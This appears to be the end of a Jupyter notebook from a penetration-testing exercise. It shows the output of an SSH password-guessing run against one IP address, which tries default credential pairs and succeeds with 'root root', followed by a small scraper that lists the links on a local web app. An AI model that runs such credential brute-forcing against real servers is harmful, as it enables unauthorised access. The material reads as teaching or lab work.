      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Failed!\n",
      "Trying with wolle wunktion\n",
      "Trying with admin password\n",
      "Trying with root toor\n",
      "Trying with admin admin\n",
      "Trying with server admin\n",
      "Trying with sinus cosinus\n",
      "Failed!\n",
      "Trying with tangens riebert\n",
      "Trying with supp woritz\n",
      "Failed!\n",
      "Trying with win noch\n",
      "Failed!\n",
      "Trying with admin password\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Failed!\n",
      "Trying with root toor\n",
      "Failed!\n",
      "Trying with admin admin\n",
      "Trying with server admin\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Failed!\n",
      "Trying with sinus cosinus\n",
      "Trying with tangens riebert\n",
      "Failed!\n",
      "Trying with supp woritz\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n",
      "Exception (client): Error reading SSH protocol banner\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2278, in _check_banner\n",
      "    buf = self.packetizer.readline(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 380, in readline\n",
      "    buf += self._read_timeout(timeout)\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/packet.py\", line 609, in _read_timeout\n",
      "    raise EOFError()\n",
      "EOFError\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2101, in run\n",
      "    self._check_banner()\n",
      "  File \"/home/sleven/anaconda3/lib/python3.7/site-packages/paramiko/transport.py\", line 2283, in _check_banner\n",
      "    \"Error reading SSH protocol banner\" + str(e)\n",
      "paramiko.ssh_exception.SSHException: Error reading SSH protocol banner\n",
      "\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "Failed!\n",
      "Trying with win noch\n",
      "Failed!\n",
      "Trying with wier und\n",
      "Trying with wolle wunktion\n",
      "Trying with wier und\n",
      "Trying with wolle wunktion\n",
      "Trying with root root\n",
      "Successfully Authenticated with root root\n"
     ]
    }
   ],
   "source": [
    "attackssh(\"141.87.29.101\")        \n"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 5,
   "metadata": {},
   "outputs": [],
   "source": [
    "#enumerate wordlist to check if recursive calling works properly\n",
    "file = open(\"sshwordlist.txt\")\n",
    "newfile = open(\"ssh\",\"w+\")\n",
    "for word, count in enumerate(file):\n",
    "        newfile.write(str(count)+str(word))\n"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 7,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "#\n",
      "index.html\n",
      "suche.html\n",
      "biete.html\n",
      "about.html\n",
      "datenschutz.html\n",
      "impressum.html\n",
      "faq.html\n",
      "biete.html\n",
      "suche.html\n",
      "angebote.html\n",
      "myangebote.html\n",
      "#\n",
      "index.html\n",
      "suche.html\n",
      "biete.html\n",
      "about.html\n",
      "datenschutz.html\n"
     ]
    }
   ],
   "source": [
    "r = requests.get(\"http://172.17.0.2:1337\")\n",
    "s = BeautifulSoup(r.text,\"html.parser\")\n",
    "urls = []\n",
    "for i in s.find_all(\"a\"):\n",
    "    hr = i.attrs['href']\n",
    "    print(hr)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 60,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "datenschutz.html\n"
     ]
    }
   ],
   "source": [
    "myscrape(\"http://172.17.0.2:1337/\")"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 10,
   "metadata": {},
   "outputs": [],
   "source": [
    "def myscrape(url):\n",
    "    r = requests.get(url)\n",
    "    soup = BeautifulSoup(r.text,\"html.parser\")\n",
    "    \n",
    "    for links in soup.find_all(\"a\"):\n",
    "        href = links.attrs['href']\n",
    "        print(href)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 11,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "#\n",
      "index.html\n",
      "suche.html\n",
      "biete.html\n",
      "about.html\n",
      "datenschutz.html\n",
      "impressum.html\n",
      "faq.html\n",
      "biete.html\n",
      "suche.html\n",
      "angebote.html\n",
      "myangebote.html\n",
      "#\n",
      "index.html\n",
      "suche.html\n",
      "biete.html\n",
      "about.html\n",
      "datenschutz.html\n"
     ]
    }
   ],
   "source": [
    "myscrape(\"http://172.17.0.2:1337\")"
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": "Python 3 (ipykernel)",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.7.13"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 2
}
